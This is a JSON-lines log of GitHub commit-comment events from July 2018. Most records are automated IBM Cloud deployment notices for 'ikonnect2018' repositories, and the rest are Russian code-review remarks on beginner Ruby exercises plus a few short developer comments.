{"id":"8031783212","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866935,"position":3,"line":3,"path":"part3/2-numbers.rb","commit_id":"0712a07ce21c008a26fb45e294dd9e94432fa0ee","created_at":"2018-07-28T06:36:41Z","updated_at":"2018-07-28T06:36:41Z","author_association":"NONE","body":"`do` здесь можно не писать"}},"created_at":"2018-07-28T06:36:41Z"}
{"id":"8031783525","type":"CommitCommentEvent","actor":{"login":"jackderla"},"repo":{"name":"jackderla/ikonnect2018v2"},"payload":{"comment":{"id":29866945,"position":null,"line":null,"path":null,"commit_id":"4728aa456a37970ea1bb2f3c6dcd0ede6a757343","created_at":"2018-07-28T06:37:01Z","updated_at":"2018-07-28T06:37:01Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/d2503a59-30d4-4006-ac8c-e6e2b8f8573c?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-Derla\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/477ebbd8-558c-4268-abba-9012e5b42c92?env_id=ibm%3Ayp%3Aus-south \"Pipeline\") deployed [ikonnect2018v2](https://github.com/jackderla/ikonnect2018v2/releases/tag/deploy-ibm-yp-us-south-derlaac-ph.ibm.com-IKON-20180728-063700 \"deploy-ibm-yp-us-south-derlaac-ph.ibm.com-IKON-20180728-063700\") to [IKON](https://console.bluemix.net/apps/f123fe30-ca16-4dfa-afb6-0577e62ceec7?env_id=ibm:yp:us-south \"ibm:yp:us-south:derlaac@ph.ibm.com:IKON\"), including this commit"}},"created_at":"2018-07-28T06:37:01Z"}
{"id":"8031783686","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866946,"position":7,"line":7,"path":"part3/3-fibonacci-numbers.rb","commit_id":"0712a07ce21c008a26fb45e294dd9e94432fa0ee","created_at":"2018-07-28T06:37:10Z","updated_at":"2018-07-28T06:37:10Z","author_association":"NONE","body":"найди для своего редактора автодобавление пустой строки в конце файла, чтобы не было красной стрелки на ГитХабе и вручную не приходилось добавлять строки в каждом файле"}},"created_at":"2018-07-28T06:37:10Z"}
{"id":"8031783831","type":"CommitCommentEvent","actor":{"login":"jpbejedor"},"repo":{"name":"jpbejedor/ikonnect2018"},"payload":{"comment":{"id":29866948,"position":null,"line":null,"path":null,"commit_id":"9b9bce43753623c457ed43422dc71d7e34db5c6c","created_at":"2018-07-28T06:37:19Z","updated_at":"2018-07-28T06:37:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/a57becf6-4981-4050-a474-c04327e2e148?env_id=ibm%3Ayp%3Aus-south \"iKonnect-jpbejedor\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1982145f-de27-4fae-8019-aeef5232d54f?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-jp\") deployed [ikonnect2018](https://github.com/jpbejedor/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-bejedoj-ph.ibm.com-test-20180728-063718 \"deploy-ibm-yp-us-south-bejedoj-ph.ibm.com-test-20180728-063718\") to [test](https://console.bluemix.net/apps/9da5b375-5dbd-48b9-9b07-bb64c04ad73f?env_id=ibm:yp:us-south \"ibm:yp:us-south:bejedoj@ph.ibm.com:test\"), including this commit"}},"created_at":"2018-07-28T06:37:19Z"}
{"id":"8031784111","type":"CommitCommentEvent","actor":{"login":"ostrakinos"},"repo":{"name":"ostrakinos/ikonnect2018"},"payload":{"comment":{"id":29866952,"position":null,"line":null,"path":null,"commit_id":"aaff32422a5bfe3178f489a04baf8eb9ed19065e","created_at":"2018-07-28T06:37:36Z","updated_at":"2018-07-28T06:37:36Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5ecd7220-9eb8-4fc0-b184-1908dbf69ec3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-mags\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/60860c60-1080-4446-a27e-a32dac39331a?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-mags\") deployed [ikonnect2018](https://github.com/ostrakinos/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-m.s.sagampod-ph.ibm.com-ikonnect2018-mags-20180728-063735 \"deploy-ibm-yp-us-south-m.s.sagampod-ph.ibm.com-ikonnect2018-mags-20180728-063735\") to [ikonnect2018-mags](https://console.bluemix.net/apps/350a43e2-09fa-4e4f-9676-81430a68d3c8?env_id=ibm:yp:us-south \"ibm:yp:us-south:m.s.sagampod@ph.ibm.com:ikonnect2018-mags\"), including this commit"}},"created_at":"2018-07-28T06:37:36Z"}
{"id":"8031784184","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866954,"position":4,"line":4,"path":"part3/3-fibonacci-numbers.rb","commit_id":"0712a07ce21c008a26fb45e294dd9e94432fa0ee","created_at":"2018-07-28T06:37:40Z","updated_at":"2018-07-28T06:37:40Z","author_association":"NONE","body":"вместо безусловного цикла `loop` с `break` внутри, лучше использовать цикл `while` с условием"}},"created_at":"2018-07-28T06:37:40Z"}
{"id":"8031784278","type":"CommitCommentEvent","actor":{"login":"seph01"},"repo":{"name":"seph01/ikonnect2018"},"payload":{"comment":{"id":29866955,"position":null,"line":null,"path":null,"commit_id":"98c195fab62d8a76940b74bb7b4df4906400197b","created_at":"2018-07-28T06:37:45Z","updated_at":"2018-07-28T06:37:45Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e8b56284-f482-445c-a366-bca2dd32394e?env_id=ibm%3Ayp%3Aus-south \"iKonnect-igartajoseph\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/7f13a238-494f-48e4-978c-e1cb24614c81?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-igartajoseph\") deployed [ikonnect2018](https://github.com/seph01/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-igartaj-ph.ibm.com-dev-20180728-063744 \"deploy-ibm-yp-us-south-igartaj-ph.ibm.com-dev-20180728-063744\") to [dev](https://console.bluemix.net/apps/aac92405-0c57-4957-9fe3-1a6c023b9d02?env_id=ibm:yp:us-south \"ibm:yp:us-south:igartaj@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:37:45Z"}
{"id":"8031784330","type":"CommitCommentEvent","actor":{"login":"gladdenmac"},"repo":{"name":"gladdenmac/ikonnect2018"},"payload":{"comment":{"id":29866956,"position":null,"line":null,"path":null,"commit_id":"8af36abd423fa31331602a247ccf0fe41e2a24c7","created_at":"2018-07-28T06:37:48Z","updated_at":"2018-07-28T06:37:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/640d7b8e-7eff-4a5f-a2fe-7bc745ce981f?env_id=ibm%3Ayp%3Aus-south \"iKonnect-gladden\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/6958b593-fec2-4358-8a8b-088f2a581ddf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-gladden\") deployed [ikonnect2018](https://github.com/gladdenmac/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-063748 \"deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-063748\") to [dev](https://console.bluemix.net/apps/241a3d46-8c77-4701-95a8-a2d3726bb410?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:macalig@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:37:48Z"}
{"id":"8031785192","type":"CommitCommentEvent","actor":{"login":"jeff-balsacao"},"repo":{"name":"jeff-balsacao/ikonnect2018"},"payload":{"comment":{"id":29866960,"position":null,"line":null,"path":null,"commit_id":"893d9b597d8eaefc656c088b8d91aec594a3a0a0","created_at":"2018-07-28T06:38:37Z","updated_at":"2018-07-28T06:38:37Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/c14ed68e-bb7f-4790-8e34-56f75f18eff3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-potpot-pogi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/70414112-d996-42a5-ac38-371f8767095f?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-potpot\") deployed [ikonnect2018](https://github.com/jeff-balsacao/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-063836 \"deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-063836\") to [ikonnect2018-potpot](https://console.bluemix.net/apps/7fd26144-2686-4134-a1fe-a8581daecae9?env_id=ibm:yp:us-south \"ibm:yp:us-south:jeff.balsacao@ph.ibm.com:ikonnect2018-potpot\"), including this commit"}},"created_at":"2018-07-28T06:38:37Z"}
{"id":"8031785372","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866961,"position":9,"line":9,"path":"part3/4-vowels.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:38:47Z","updated_at":"2018-07-28T06:38:47Z","author_association":"NONE","body":"в руби стараются не использовать переменные для индекса с \"ручным управлением\"\r\n\r\nпредпочтение отдается использованию \"специальных методов\": [each_with_index](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-each_with_index) или [each.with_index(n)](https://ruby-doc.org/core-2.5.1/Enumerator.html#method-i-with_index)\r\n\r\nпро использование второго из этих методов можно почитать к примеру в ответе на [вопрос про each.with_index(n) на СО](https://stackoverflow.com/questions/20258086/difference-between-each-with-index-and-each-with-index-in-ruby)"}},"created_at":"2018-07-28T06:38:47Z"}
{"id":"8031785623","type":"CommitCommentEvent","actor":{"login":"seph01"},"repo":{"name":"seph01/ikonnect2018"},"payload":{"comment":{"id":29866962,"position":null,"line":null,"path":null,"commit_id":"90e85a15e93765b515e0a5b782b02000598926d1","created_at":"2018-07-28T06:39:04Z","updated_at":"2018-07-28T06:39:04Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e8b56284-f482-445c-a366-bca2dd32394e?env_id=ibm%3Ayp%3Aus-south \"iKonnect-igartajoseph\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/7f13a238-494f-48e4-978c-e1cb24614c81?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-igartajoseph\") deployed [ikonnect2018](https://github.com/seph01/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-igartaj-ph.ibm.com-dev-20180728-063903 \"deploy-ibm-yp-us-south-igartaj-ph.ibm.com-dev-20180728-063903\") to [dev](https://console.bluemix.net/apps/aac92405-0c57-4957-9fe3-1a6c023b9d02?env_id=ibm:yp:us-south \"ibm:yp:us-south:igartaj@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:39:04Z"}
{"id":"8031785716","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866963,"position":2,"line":2,"path":"part3/4-vowels.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:39:09Z","updated_at":"2018-07-28T06:39:09Z","author_association":"NONE","body":"пустой хеш принято задавать так:\r\n```ruby\r\nhash = {}\r\n```"}},"created_at":"2018-07-28T06:39:09Z"}
{"id":"8031786168","type":"CommitCommentEvent","actor":{"login":"RicoVergara"},"repo":{"name":"RicoVergara/ikonnect2018"},"payload":{"comment":{"id":29866966,"position":null,"line":null,"path":null,"commit_id":"a4cfe3ee863cae4cbf3ab8c7a627ed418469b9b4","created_at":"2018-07-28T06:39:36Z","updated_at":"2018-07-28T06:39:36Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8aa787c2-b105-400e-a249-6b38d1494713?env_id=ibm%3Ayp%3Aus-south \"iKonnect-RicoVergara\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/67f575fb-9bff-4d71-85f8-07c552284034?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-RicoVergara\") deployed [ikonnect2018](https://github.com/RicoVergara/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-vergare-ph.ibm.com-Dev-20180728-063935 \"deploy-ibm-yp-au-syd-vergare-ph.ibm.com-Dev-20180728-063935\") to [Dev](https://console.bluemix.net/apps/358686ca-12d5-422c-96f7-8087e136e457?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:vergare@ph.ibm.com:Dev\"), including this commit"}},"created_at":"2018-07-28T06:39:36Z"}
{"id":"8031786280","type":"CommitCommentEvent","actor":{"login":"gladdenmac"},"repo":{"name":"gladdenmac/ikonnect2018"},"payload":{"comment":{"id":29866967,"position":null,"line":null,"path":null,"commit_id":"142f0729dfbb22b024743e5c6e3a81453567a2af","created_at":"2018-07-28T06:39:42Z","updated_at":"2018-07-28T06:39:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/640d7b8e-7eff-4a5f-a2fe-7bc745ce981f?env_id=ibm%3Ayp%3Aus-south \"iKonnect-gladden\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/6958b593-fec2-4358-8a8b-088f2a581ddf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-gladden\") deployed [ikonnect2018](https://github.com/gladdenmac/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-063942 \"deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-063942\") to [dev](https://console.bluemix.net/apps/241a3d46-8c77-4701-95a8-a2d3726bb410?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:macalig@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:39:42Z"}
{"id":"8031787127","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866971,"position":13,"line":13,"path":"part3/5-date_number.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:40:29Z","updated_at":"2018-07-28T06:40:29Z","author_association":"NONE","body":"использование хеша не очень оправданно, т.к. программе по сути не нужен доступ к определенным данным по ключу, а нужен последовательный перебор элементов коллекции\r\nс этой задачей массивы справляются гораздо лучше хешей, хеши - адресные хранилища\r\n\r\nдостаточно одномероного массива для хранения кол-ва дней в месяце, без указания самого месяца"}},"created_at":"2018-07-28T06:40:29Z"}
{"id":"8031787207","type":"CommitCommentEvent","actor":{"login":"jonardedos"},"repo":{"name":"jonardedos/ikonnect2018"},"payload":{"comment":{"id":29866972,"position":null,"line":null,"path":null,"commit_id":"05935d84ac037b275b512a69e28eb11424fd8f8c","created_at":"2018-07-28T06:40:35Z","updated_at":"2018-07-28T06:40:35Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/fef1046e-218a-4182-8e09-27e40d9603c3?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-JonardEdos\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/e7df5bd5-3bf8-45c2-ac85-cb63f9284688?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-JonardEdos\") deployed [ikonnect2018](https://github.com/jonardedos/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-JME-Interactive-dev-20180728-064034 \"deploy-ibm-yp-us-south-JME-Interactive-dev-20180728-064034\") to [dev](https://console.bluemix.net/apps/2e0f7219-9d99-4bc0-bfcc-fc4560253e96?env_id=ibm:yp:us-south \"ibm:yp:us-south:JME Interactive:dev\"), including this commit"}},"created_at":"2018-07-28T06:40:35Z"}
{"id":"8031788357","type":"CommitCommentEvent","actor":{"login":"ostrakinos"},"repo":{"name":"ostrakinos/ikonnect2018"},"payload":{"comment":{"id":29866974,"position":null,"line":null,"path":null,"commit_id":"eaad9f92bb41a17e84fd1685155c76a7ed9187e6","created_at":"2018-07-28T06:41:39Z","updated_at":"2018-07-28T06:41:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5ecd7220-9eb8-4fc0-b184-1908dbf69ec3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-mags\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/60860c60-1080-4446-a27e-a32dac39331a?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-mags\") deployed [ikonnect2018](https://github.com/ostrakinos/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-m.s.sagampod-ph.ibm.com-ikonnect2018-mags-20180728-064138 \"deploy-ibm-yp-us-south-m.s.sagampod-ph.ibm.com-ikonnect2018-mags-20180728-064138\") to [ikonnect2018-mags](https://console.bluemix.net/apps/350a43e2-09fa-4e4f-9676-81430a68d3c8?env_id=ibm:yp:us-south \"ibm:yp:us-south:m.s.sagampod@ph.ibm.com:ikonnect2018-mags\"), including this commit"}},"created_at":"2018-07-28T06:41:39Z"}
{"id":"8031788750","type":"CommitCommentEvent","actor":{"login":"mpastell"},"repo":{"name":"mpastell/Weave.jl"},"payload":{"comment":{"id":29866978,"position":null,"line":null,"path":null,"commit_id":"a5ba74dcd1f87e4b0585646cd657dd2e9d5b00c3","created_at":"2018-07-28T06:42:02Z","updated_at":"2018-07-28T06:42:02Z","author_association":"OWNER","body":"I only got tests to run by setting Plots as depency, I’m not sure if test depencies are implemented in Pkg3 at the moment"}},"created_at":"2018-07-28T06:42:02Z"}
{"id":"8031789085","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866980,"position":14,"line":14,"path":"part3/5-date_number.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:42:18Z","updated_at":"2018-07-28T06:42:18Z","author_association":"NONE","body":"переменные лучше инициализировать ближе к точке их первого использования\r\nэта переменная впервые используется в 42 строке"}},"created_at":"2018-07-28T06:42:18Z"}
{"id":"8031789214","type":"CommitCommentEvent","actor":{"login":"jeff-balsacao"},"repo":{"name":"jeff-balsacao/ikonnect2018"},"payload":{"comment":{"id":29866981,"position":null,"line":null,"path":null,"commit_id":"895b51f7e75e617d1a13f685d42af1b5988999da","created_at":"2018-07-28T06:42:25Z","updated_at":"2018-07-28T06:42:25Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/c14ed68e-bb7f-4790-8e34-56f75f18eff3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-potpot-pogi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/70414112-d996-42a5-ac38-371f8767095f?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-potpot\") deployed [ikonnect2018](https://github.com/jeff-balsacao/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-064224 \"deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-064224\") to [ikonnect2018-potpot](https://console.bluemix.net/apps/7fd26144-2686-4134-a1fe-a8581daecae9?env_id=ibm:yp:us-south \"ibm:yp:us-south:jeff.balsacao@ph.ibm.com:ikonnect2018-potpot\"), including this commit"}},"created_at":"2018-07-28T06:42:25Z"}
{"id":"8031789536","type":"CommitCommentEvent","actor":{"login":"Mel-13"},"repo":{"name":"Mel-13/ikonnect2018"},"payload":{"comment":{"id":29866983,"position":null,"line":null,"path":null,"commit_id":"f17f737d53771c99956863c5ee3acaeae83cb056","created_at":"2018-07-28T06:42:45Z","updated_at":"2018-07-28T06:42:45Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/a7d8821e-4328-4067-a4b8-51f135df2841?env_id=ibm%3Ayp%3Aus-south \"InputiKonnect - Mel Alvin Yanga\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/93c6cb81-b3e5-484b-8c78-27a79ef9fcdf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018\") deployed [ikonnect2018](https://github.com/Mel-13/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-Accounts-Payable-dev-20180728-064245 \"deploy-ibm-yp-au-syd-Accounts-Payable-dev-20180728-064245\") to [dev](https://console.bluemix.net/apps/cb339ed3-df9e-4ce8-a752-2521d21b2c57?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:Accounts Payable:dev\"), including this commit"}},"created_at":"2018-07-28T06:42:45Z"}
{"id":"8031789942","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29866985,"position":34,"line":34,"path":"part3/5-date_number.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:43:12Z","updated_at":"2018-07-28T06:43:12Z","author_association":"NONE","body":"скобки не обязательны, т.к. `&&` имеет более высокий приоритет, чем `||`"}},"created_at":"2018-07-28T06:43:12Z"}
{"id":"8031790567","type":"CommitCommentEvent","actor":{"login":"zaoxiangji"},"repo":{"name":"zaoxiangji/test"},"payload":{"comment":{"id":29866986,"position":null,"line":null,"path":null,"commit_id":"18782926b71eb52695e4eb0fd0550e596d26d411","created_at":"2018-07-28T06:43:48Z","updated_at":"2018-07-28T06:43:48Z","author_association":"OWNER","body":"this is a test commit"}},"created_at":"2018-07-28T06:43:48Z"}
{"id":"8031791181","type":"CommitCommentEvent","actor":{"login":"jeff-balsacao"},"repo":{"name":"jeff-balsacao/ikonnect2018"},"payload":{"comment":{"id":29866987,"position":null,"line":null,"path":null,"commit_id":"6e06efcb486ca5270078f4d62d790d8bfd67cf2b","created_at":"2018-07-28T06:44:24Z","updated_at":"2018-07-28T06:44:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/c14ed68e-bb7f-4790-8e34-56f75f18eff3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-potpot-pogi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/70414112-d996-42a5-ac38-371f8767095f?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-potpot\") deployed [ikonnect2018](https://github.com/jeff-balsacao/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-064423 \"deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-064423\") to [ikonnect2018-potpot](https://console.bluemix.net/apps/7fd26144-2686-4134-a1fe-a8581daecae9?env_id=ibm:yp:us-south \"ibm:yp:us-south:jeff.balsacao@ph.ibm.com:ikonnect2018-potpot\"), including this commit"}},"created_at":"2018-07-28T06:44:24Z"}
{"id":"8031791969","type":"CommitCommentEvent","actor":{"login":"gladdenmac"},"repo":{"name":"gladdenmac/ikonnect2018"},"payload":{"comment":{"id":29866995,"position":null,"line":null,"path":null,"commit_id":"4fcf46054de22d383d816c46b20325dffb962486","created_at":"2018-07-28T06:45:06Z","updated_at":"2018-07-28T06:45:06Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/640d7b8e-7eff-4a5f-a2fe-7bc745ce981f?env_id=ibm%3Ayp%3Aus-south \"iKonnect-gladden\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/6958b593-fec2-4358-8a8b-088f2a581ddf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-gladden\") deployed [ikonnect2018](https://github.com/gladdenmac/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-064505 \"deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-064505\") to [dev](https://console.bluemix.net/apps/241a3d46-8c77-4701-95a8-a2d3726bb410?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:macalig@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:45:06Z"}
{"id":"8031792534","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29867000,"position":42,"line":42,"path":"part3/5-date_number.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:45:36Z","updated_at":"2018-07-28T06:45:36Z","author_association":"NONE","body":"лучше не дублировать имена переменных, даже если они находятся в разных скоупах\r\nздесь внутренняя переменная блока дублирует внешнюю переменную, что не рекомендуется, т.к.может привести к путаннице и неверной работе кода\r\n\r\nречь идет о переменной `month`"}},"created_at":"2018-07-28T06:45:36Z"}
{"id":"8031792787","type":"CommitCommentEvent","actor":{"login":"souravk9709"},"repo":{"name":"souravk9709/estatevr"},"payload":{"comment":{"id":29867001,"position":null,"line":null,"path":null,"commit_id":"643dc97e96c3495d78af480fe5919d15da607381","created_at":"2018-07-28T06:45:50Z","updated_at":"2018-07-28T06:45:50Z","author_association":"OWNER","body":"![screenshot 2018-07-03 08 15 26](https://user-images.githubusercontent.com/38369106/43353921-a87f2bee-925f-11e8-8ecd-11ed47da4be9.png)\r\n![screenshot 2018-07-03 08 15 32](https://user-images.githubusercontent.com/38369106/43353922-a8db1e4a-925f-11e8-89ee-90dcc86c0964.png)\r\n![screenshot 2018-07-03 08 15 36](https://user-images.githubusercontent.com/38369106/43353923-a9124a8c-925f-11e8-8a94-247a5f6ad912.png)\r\n![screenshot 2018-07-03 08 15 51](https://user-images.githubusercontent.com/38369106/43353925-a983f2e0-925f-11e8-9868-ff9155aa9ea7.png)\r\n![screenshot 2018-07-03 08 15 55](https://user-images.githubusercontent.com/38369106/43353926-a9c150e0-925f-11e8-83e1-dfb2ac97224e.png)\r\n![screenshot 2018-07-03 08 16 01](https://user-images.githubusercontent.com/38369106/43353927-aa00f0f6-925f-11e8-96d5-b65502494dd0.png)\r\n![screenshot 2018-07-03 08 16 23](https://user-images.githubusercontent.com/38369106/43353928-aa450fb6-925f-11e8-9223-d17422ee847a.png)\r\n![screenshot 2018-07-03 08 16 36](https://user-images.githubusercontent.com/38369106/43353929-aa8e2692-925f-11e8-85d8-608adb6013c0.png)\r\n![screenshot 2018-07-03 08 15 07](https://user-images.githubusercontent.com/38369106/43353930-ab06b12a-925f-11e8-94f8-642f5c3b836e.png)\r\n![screenshot 2018-07-03 08 15 16](https://user-images.githubusercontent.com/38369106/43353931-ab6f815a-925f-11e8-9a60-eeb502ce8100.png)"}},"created_at":"2018-07-28T06:45:50Z"}
{"id":"8031793257","type":"CommitCommentEvent","actor":{"login":"rashmigs1993"},"repo":{"name":"intuit/wasabi"},"payload":{"comment":{"id":29867002,"position":null,"line":null,"path":null,"commit_id":"6cba19e11a371eb44c38c447a3b78e6732ba2a4e","created_at":"2018-07-28T06:46:18Z","updated_at":"2018-07-28T06:46:18Z","author_association":"CONTRIBUTOR","body":"@kevcampb Thanks for pointing this out .. Working on fixing it .. "}},"created_at":"2018-07-28T06:46:18Z"}
{"id":"8031794298","type":"CommitCommentEvent","actor":{"login":"Mel-13"},"repo":{"name":"Mel-13/ikonnect2018"},"payload":{"comment":{"id":29867003,"position":null,"line":null,"path":null,"commit_id":"93fa4c68059f06eeca282a851c41faef7ff70bcb","created_at":"2018-07-28T06:47:16Z","updated_at":"2018-07-28T06:47:16Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/a7d8821e-4328-4067-a4b8-51f135df2841?env_id=ibm%3Ayp%3Aus-south \"InputiKonnect - Mel Alvin Yanga\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/93c6cb81-b3e5-484b-8c78-27a79ef9fcdf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018\") deployed [ikonnect2018](https://github.com/Mel-13/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-Accounts-Payable-dev-20180728-064715 \"deploy-ibm-yp-au-syd-Accounts-Payable-dev-20180728-064715\") to [dev](https://console.bluemix.net/apps/cb339ed3-df9e-4ce8-a752-2521d21b2c57?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:Accounts Payable:dev\"), including this commit"}},"created_at":"2018-07-28T06:47:16Z"}
{"id":"8031794846","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29867005,"position":14,"line":14,"path":"part3/5-date_number.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:47:49Z","updated_at":"2018-07-28T06:47:49Z","author_association":"NONE","body":"если здесь присвоить не ноль, а `day`, то 44 строка не понадобится"}},"created_at":"2018-07-28T06:47:49Z"}
{"id":"8031795647","type":"CommitCommentEvent","actor":{"login":"sipian"},"repo":{"name":"prometheus/prombench"},"payload":{"comment":{"id":29867008,"position":13,"line":433,"path":"provider/gke/gke.go","commit_id":"c8939530d410830a3a14da7dc1923d1530023117","created_at":"2018-07-28T06:48:27Z","updated_at":"2018-07-28T06:48:27Z","author_association":"CONTRIBUTOR","body":"This will also normalize the release number in the `quay.io/prometheus/prometheus:<RELEASE>`"}},"created_at":"2018-07-28T06:48:27Z"}
